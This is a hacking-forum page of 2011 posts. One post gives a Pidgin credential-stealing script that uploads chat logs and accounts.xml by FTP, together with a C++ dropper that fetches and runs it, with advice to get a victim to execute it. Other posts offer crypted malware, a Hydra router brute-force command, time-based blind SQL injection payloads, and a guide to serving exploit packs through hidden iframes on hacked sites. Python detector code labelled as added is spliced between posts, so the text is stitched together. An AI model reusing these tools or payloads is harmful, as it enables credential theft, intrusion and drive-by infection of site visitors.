
Leaderboard

Popular Content

Showing content with the highest reputation on 12/04/11 in all areas

  1. We have a small source (comma) that grabs the data from Pidgin (http://rstcenter.com/forum/43047-sh0rt-line-c0de-3.rst#post296355) and a C++ script whose job is to mislead the victim. I express myself terribly, but you'll understand.

     pidgin-getdata @ http://sprunge.us/FQPV

       #!/bin/bash
       cd $HOME/.purple/
       UDIRX='pwd'
       HOST='www.site.ro'
       FUSER='ftpuser'
       PASSWD='ftppasswd'
       tar -cf $USER.tar 'logs/' 'accounts.xml'
       ftp -n -v $HOST << EOT
       ascii
       user $FUSER $PASSWD
       prompt
       mkdir $USER
       cd $USER
       mput $USER.tar $UDIRX
       bye
       EOT
       rm -rf $USER.tar

     steal.cpp

       #include <iostream>
       #include <stdlib.h>
       using namespace std;
       int main() {
           system("wget http://sprunge.us/FQPV");
           system("chmod +x FQPV");
           system("./FQPV");
           system("rm -rf FQPV");
           return 0;
       }

     Compile the C++ script with your own link, rename the file, then get the victim to run it. Small, crappy, but useful.

     // ? Uploads the .tar archive into the current directory, the archive being named after the logged-in user. pwd is there to print the current directory.
     // Not needed. I used g++ -o stealer fisier.cpp and it doesn't need execute permission.
    2 points
  2. You know what it is ..

     Download link: First it is crypted with "X", then the "result" crypted with Y, and KeyPass "BULLSHIT" without the quotes.

     File Info
     Report date: 2011-12-03
     Scan Occured:
     Link to scan: http://my-avscan.com/result.php?scan=Mjk5ODU1
     File name: crypted.exe
     File size: 1432064 bytes
     MD5 Hash: 004b8b2e02630b0fa253b316c9ada81c
     SHA1 Hash: 9c18c25030fdfa9ec735139c7c807adbf47f2843
     Detection rate: 3 out of 35
     Status: INFECTED

     Scan report generated by My-AVScan.com

     I think the result also depends on the icon. SCAN ONLY ON MY-AVSCAN.COM OR NOVIRUSTHANKS.

     source
    1 point
  3. 1) Go to Qvius (http://qvius.mail.everyone.net/email/scripts/loginuser.pl?EV1=13206360967351872)
     2) Fill in the information
     3) Say "No" to all the offers
     4) Bam, you got yourself a free .edu email

     Benefits:
     - Free stuff from here occasionally w/ .edu email. I got $5 Starbucks once: http://www.studentcoupons.com/
     - Free Amazon Prime for 1 year and/or discounted rate: http://www.amazon.com/gp/student/signup/info
     - Free Microsoft software: https://www.dreamspark.com/default.aspx
     - More free software: http://students.autodesk.com
     - Double Dropbox space bonus: http://dropbox.com/edu
     - Free Pro account: http://promos.connectify.me/
    1 point
  4. Brosix (formerly known as Brosix Corporate Instant Messenger) is a secure instant messenger that is designed to help users connect to each other. It uses 256-bit AES encryption to encrypt messages, thus ensuring their security. Brosix employs advanced peer-to-peer technology to make sure the communication is routed directly between the users whenever possible. It also compresses the data, so sending files is much faster with Brosix.

     Here are some key features of "Brosix":
     · Text chat with rich text formatting
     · Offline messages
     · Text Conference
     · Voice Chat
     · Video Chat
     · Voice Conference
     · Voice Mail
     · File Transfer
     · Co-Browse
     · Whiteboard
     · Screen Sharing
     · Private IM networking
     · Firewall friendly and true P2P communication
     · Encryption

     Requirements:
     · 128 MB RAM
     · 50 MB disk space
     · 800 MHz CPU or higher
     · Internet connection

     Availability
     Brosix works on many platforms.
     + Windows
     + Mac
     + Linux
     + Android
     + iPhone / iPad

     Download
    1 point
  5. NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.

     NetworkMiner collects data (such as forensic evidence) about hosts on the network rather than collecting data regarding the traffic on the network. The main user interface view is host centric (information grouped per host) rather than packet centric (information shown as a list of packets/frames).

     NetworkMiner has, since the first release in 2007, become a popular tool among incident response teams as well as law enforcement. NetworkMiner is today used by companies and organizations all over the world.

     NETRESEC NetworkMiner - The Network Forensics Analysis Tool

     This video was made to show some of the extra features of NetworkMiner Professional, like Pcap-over-IP, running on OS X under Mono, export of results to CSV / Excel, GeoIP localization, host coloring support, and command line scripting support.
     http://www.irongeek.com/i.php?page=videos/networkminer-professional
    1 point
  6. This will give you a quick rundown on how to brute force your router if it uses HTTP BASIC AUTH using THC-HYDRA. If you receive a popup window when you try to access your router, then this method should work for you.

     hydra -l {username} -P {password list path} -s {port} {IP Address} http-get /

     My command looks like:

     hydra -l admin -P password.lst -s 80 192.168.1.2 http-get /

     Command breakdown:
     hydra --> the hydra program
     -l --> (lower case "L", not to be confused with an upper case "i") single username to target. Use uppercase -L to specify a username list
     -P --> provide the path to the password list. -p to try a single password, i.e. "passw0rd"
     -s --> port to target; your router may run on a different port such as 8080
     {IP Address} hopefully this is clear
     http-get --> service to brute force
     "/" --> this specifies the page to target; if this is left out the command will not run. "/" just indicates the root; do not include the "

     You will get an output line with the username and password if you are successful. This attack is only as good as your dictionary.
    1 point
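From the defender's side, the run described above is easy to spot: each guess is one request to the router's root that is answered with 401 until a guess succeeds. The following detector, an added example that is not part of the original post, walks constructed common-log-format lines (the IP addresses, timestamps and threshold are made up) and reports clients that pile up 401s for "/" within a short window, noting whether a 200 followed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in common log format (not real traffic). Hydra's http-get
# module sends one "GET /" per guess, each with a different Authorization
# header, so a burst of 401s for "/" from a single client is the signal.
SAMPLE_LOG = """\
192.168.1.50 - - [04/Dec/2011:10:15:01 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [04/Dec/2011:10:15:01 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [04/Dec/2011:10:15:02 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [04/Dec/2011:10:15:02 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [04/Dec/2011:10:15:03 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - - [04/Dec/2011:10:15:03 +0000] "GET / HTTP/1.0" 200 812
192.168.1.77 - - [04/Dec/2011:10:20:00 +0000] "GET / HTTP/1.1" 401 0
192.168.1.77 - - [04/Dec/2011:10:20:09 +0000] "GET / HTTP/1.1" 200 812
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse(log_text):
    """Yield (ip, timestamp, path, status) for each parseable line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            yield m.group("ip"), ts, m.group("path"), int(m.group("status"))

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: (max_401s_in_window, succeeded_after)} for clients with at
    least `threshold` 401s inside any `window`; succeeded_after is True when
    the same client then received a 200, i.e. a guess probably worked."""
    events = defaultdict(list)
    for ip, ts, _path, status in parse(log_text):
        events[ip].append((ts, status))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [ts for ts, st in evs if st == 401]
        best, start = 0, 0
        for end in range(len(fails)):          # sliding window over failures
            while fails[end] - fails[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            succeeded = any(st == 200 and ts >= fails[-1] for ts, st in evs)
            hits[ip] = (best, succeeded)
    return hits
```

A single wrong password from 192.168.1.77 stays below the threshold, while the burst from 192.168.1.50 is reported together with the fact that a 200 followed it.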
  7. ===========================
     Indexed blind SQL injection
     ===========================

     :Author: gamma95 <gamma95 [at] gmail> and his minions
     :Date: December 03, 2011

     Time based blind SQL attack suffers from a low bit/request ratio. Each request produces only one valuable bit of information. This paper describes a tweak that produces a higher yield at the expense of longer runtime. Along the way, some issues and notes of applicability are also discussed.

     Background
     ++++++++++

     Time based blind SQL injection attack is probably the most well-known technique on the planet. The method works by analyzing the time difference in various queries. Because query execution time is a side effect of a query, no visible output is required for this method to succeed. For example, a query could request that the DBMS sleep for 10 seconds if the first character of the username is ``A``.

     Usually, the time based technique goes hand in hand with binary search. Instead of asking if the first character is ``1``, then ``2``, then ``3``, it could partition the possible values into two ranges (say from ``0`` to ``4`` and ``5`` to ``9``) and ask if the first character is less than ``5``. Depending on the result, it picks out the more likely range and repeats the process until there is only one possible value. This effectively puts a logarithmic bound on the number of requests to the DBMS. In other words, each request gives us one bit of information.

     Increasing the usable bit/request ratio
     +++++++++++++++++++++++++++++++++++++++

     Due to the low bit/request ratio, an attack attempt usually leaves behind too many requests in the access log. This is undesirable. A better approach could be to encode the correct value into the query execution time itself. For example, if we know the value is a number from 0 to 9, we could ask the DBMS to sleep for that many seconds straight. In this case, one request carries more than 3 bits of usable information. This is the principal idea behind our tweak.

     Indexed time based attack
     +++++++++++++++++++++++++

     To encode more bits into the execution time, we must work with variable numeric delay values. Therefore, we need two things:

     + A measurable delay interval. Too short an interval and network latency could negatively affect our measurement. Too long a delay will also waste our time.
     + And its mapping to target values. A delay of one second could mean character ``A`` or it could also mean some other value, depending on the possible domain.

     These necessitate an array-like index search. Say, if our domain is ten (character) values from ``0`` to ``9``, then we can easily combine them into an array like shown below.

     ::

         1   2   3   4   5   6   7   8   9   10   (index)
         |   |   |   |   |   |   |   |   |   |
         v   v   v   v   v   v   v   v   v   v
       +---+---+---+---+---+---+---+---+---+---+
       | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |  (value)
       +---+---+---+---+---+---+---+---+---+---+

     Given a random character, we can tell in one request if it is in this set, and if it is, what specific character it actually is. The way to do that is by delaying the query time by the index of the character. If the input character is not in the set, there will be no delay. If it is, its index is determinable from the sleep time.

     An example
     ++++++++++

     Suppose we are trying to grab version information from a **MySQL** server. Possible characters include 0-9 and period. Observe the execution time.

     ::

       select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));
       1 row in set (6.04 sec)    # index 6, value '5'

       select sleep(find_in_set(mid(@@version, 2, 1), '0,1,2,3,4,5,6,7,8,9,.'));
       1 row in set (11.00 sec)   # index 11, value '.'

       select sleep(find_in_set(mid(@@version, 3, 1), '0,1,2,3,4,5,6,7,8,9,.'));
       1 row in set (2.00 sec)    # index 2, value '1'
       ...

     Each request gives us exactly one character (not bit).

     Notes of applicability
     ++++++++++++++++++++++

     Adjusting sleep time
     ====================

     A faster sleep time is easily achievable by multiplying the index by some factor smaller than 1. For example, we can sleep half the time as before::

       select sleep(0.5 * find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));
       1 row in set (3.00 sec)    # index 6, value '5'

     Similarly, a longer sleep time can use factors greater than 1.

     Guarding against network latency
     ================================

     Time based attacks generally work best in a fast and reliable networked environment. Small jitters in latency could skew the measurements and affect the end result. However, the technique we are describing here could be modified to support network latency. The idea is that since the sleeping time is a calculated number, we could add to it a fixed amount of time for latency, or prepend some invalid characters (such as ``a`` when the domain is 0-9) to the domain set.

     ::

       select sleep(find_in_set(mid(@@version, 1, 1), 'a,a,a,a,0,1,2,3,4,5,6,7,8,9,.'));
       1 row in set (10.00 sec)   # index 10, value '5'

     We can also sprinkle invalid characters in between valid characters to manually adjust the amount of sleeping time.

     Picking an acceptable domain
     ============================

     The set of possible values should be carefully picked to match the value that one expects. A wide domain (more values) has a better chance of catching the input, but it requires a longer sleep time on average. A narrow domain (fewer values) has a slimmer chance of catching the input, but it generally finishes faster on average.

     Some web frameworks enforce a maximum execution time. A query that takes more than, say, 30 seconds will be a prime target for early termination (and possibly logging). Therefore, picking out an acceptable domain is not only an optimization but sometimes a necessity.

     Using other functions
     =====================

     ``find_in_set`` is only one of the string search functions that MySQL supports. One can also use other functions such as ``instr``, ``locate``, and ``position``.

     Sleeping in ``WHERE`` clause
     ============================

     Most of the time, the injection point is in a ``WHERE`` clause. Because the ``WHERE`` clause is tested against all candidate rows, we had better make sure that there is only **one** candidate. We can do that by making sure the table scan produces one row. Otherwise, our sleep measure will be multiplied by the number of candidates.

     ::

       create table test (a int primary key, b char(16));
       insert into test values(1, 'abcd');
       insert into test values(2, 'zyxw');

       select count(*) from test;
       +----------+
       | count(*) |
       +----------+
       |        2 |
       +----------+
       # we have 2 rows in table test

       select * from test where sleep(locate(mid(@@version, 1, 1), '0123456789.'));
       Empty set (12.00 sec)
       # here we sleep for 12 seconds because all (2) rows are tested

       select * from test where a=1 and sleep(locate(mid(@@version, 1, 1), '0123456789.'));
       Empty set (6.00 sec)
       # here we sleep for 6 seconds because only one row is tested

     Conclusion
     ++++++++++

     This paper described a small tweak to the well-known time based SQL injection technique. The principle behind the increase in bit/request ratio is encoding more information in the query execution time. This is done with index based array search functions such as ``find_in_set``. The desirably smaller number of requests comes at the expense of generally longer execution time.

     This paper also discussed some technical concerns that one must pay close attention to when employing the technique. Minute aspects such as table scan, applicable value domain, network latency, and amount of sleep time are at the top of the list to watch out for.

     Acknowledgement
     +++++++++++++++

     Thanks go to Nam Nguyen for his early review and support.
    1 point
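The paper's own observations, that a delay function is fed by an index-search function over an extracted character and that the delay scales with the domain size, the factor, and the number of candidate rows, give a defender both a query-log signature and a basis for sizing a statement timeout. The code below, an added example that is not part of the paper, classifies constructed MySQL-style statements (made up, not captured from any system) and computes the worst-case sleep an indexed probe can cause.

```python
import re

# Constructed sample statements in the style of a MySQL general query log
# (not captured from any real system).
SAMPLE_QUERIES = [
    "select * from test where a=1 and sleep(locate(mid(@@version, 1, 1), '0123456789.'))",
    "select sleep(0.5 * find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'))",
    "select sleep(10)",
    "select benchmark(5000000, sha1(instr(substring(user(), 1, 1), 'abc')))",
    "select name from users where id = 42",
]

# Delay primitives, the index-search functions the paper lists, and the
# character-extraction functions that feed them.
DELAY_FUNCS = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
INDEX_FUNCS = re.compile(r"\b(?:find_in_set|instr|locate|position)\s*\(", re.I)
CHAR_FUNCS = re.compile(r"\b(?:mid|substr|substring)\s*\(", re.I)

def classify(query):
    """Label a statement by the injection pattern it resembles.

    'indexed-time-based': a delay function combined with an index search over
    an extracted character (the paper's tweak, one character per request).
    'time-based': a bare delay function (classic one-bit-per-request probe).
    'benign': neither.
    """
    has_delay = DELAY_FUNCS.search(query) is not None
    if has_delay and INDEX_FUNCS.search(query) and CHAR_FUNCS.search(query):
        return "indexed-time-based"
    return "time-based" if has_delay else "benign"

def flag_log(queries):
    """Return [(verdict, query)] for every non-benign statement."""
    return [(classify(q), q) for q in queries if classify(q) != "benign"]

def worst_case_delay(domain_size, factor=1.0, candidate_rows=1):
    """Longest sleep one indexed probe can cause: the highest possible index
    times the scaling factor, multiplied again by every candidate row the
    WHERE clause is evaluated against (the paper's 2-row example doubles the
    6-second sleep to 12).  A statement timeout below this value cuts probes
    off before the full domain can be encoded."""
    return domain_size * factor * candidate_rows
```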
  8. "The best guide to the Metasploit Framework." —HD Moore, Founder of the Metasploit Project

     The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester's Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors.

     Once you've built your foundation for penetration testing, you'll learn the Framework's conventions, interfaces, and module system as you launch simulated attacks. You'll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, wireless attacks, and targeted social-engineering attacks.

     Learn how to:
     - Find and exploit unmaintained, misconfigured, and unpatched systems
     - Perform reconnaissance and find valuable information about your target
     - Bypass anti-virus technologies and circumvent security controls
     - Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
     - Use the Meterpreter shell to launch further attacks from inside the network
     - Harness standalone Metasploit utilities, third-party tools, and plug-ins
     - Learn how to write your own Meterpreter post exploitation modules and scripts

     You'll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to secure your own networks or to put someone else's to the test, Metasploit: The Penetration Tester's Guide will take you there and beyond.

     Download: http://www.4shared.com/document/FjsmhQyx/Metasploit_The_Penetration_Tes.html
    1 point
  9. In case you aren't familiar with exploit packs, they are browser exploit bundles you can use to drop whatever files you want to visitors of third-party sites. Keep in mind all the exploit packs listed are public, which means their success rate is small (10% rate at best). Still, if you inject this in a high traffic site that is still a good number of fresh targets.

     To use many of these you will need an ioncube loader on the server, which you can get here.. http://www.ioncube.com/loaders.php

     Speaking of which, you have two options available. You can either find a bulletproof host to host your exploit pack or host it locally on your machine. If you decide to host it yourself you should make it a hidden service. Here is a guide to setting one up safely.. https://hackbloc.org/sites/hackbloc.org/files/hidsec.pdf

     You can then use something like tor2web in order for the injection to function properly. When you hopefully have the exploit pack up and running you can either inject an iframe into pages on a hacked site or, if you manage to drop a shell, use the mass injection tool to autoinject every page..

     <iframe src="http://your_url_here.tor2web.com" width="0" height="0" FRAMEBORDER="0" ></iframe>

     Keep in mind that if there is an exe in the exploit pack you downloaded DO NOT run it. Replace the exe with your file.

     Finally, with all that explained, here are the exploit packs:
     0x88
     Adpack
     Armitage
     Blackhole
     Bleeding Life v2
     Cry217
     Fiesta
     Firepack
     G-Pack
     IcePack
     IcePack Platinum
     Luiz Eleonore
     Multisploit
     My-Poly-Sploit
     Phoenix
     Rds
     Smartpack
     Target-Exploit
     Unique Pack
     X-Pack

     LINK : http://www.multiupload.com/PJ4NL3C3Q0
    1 point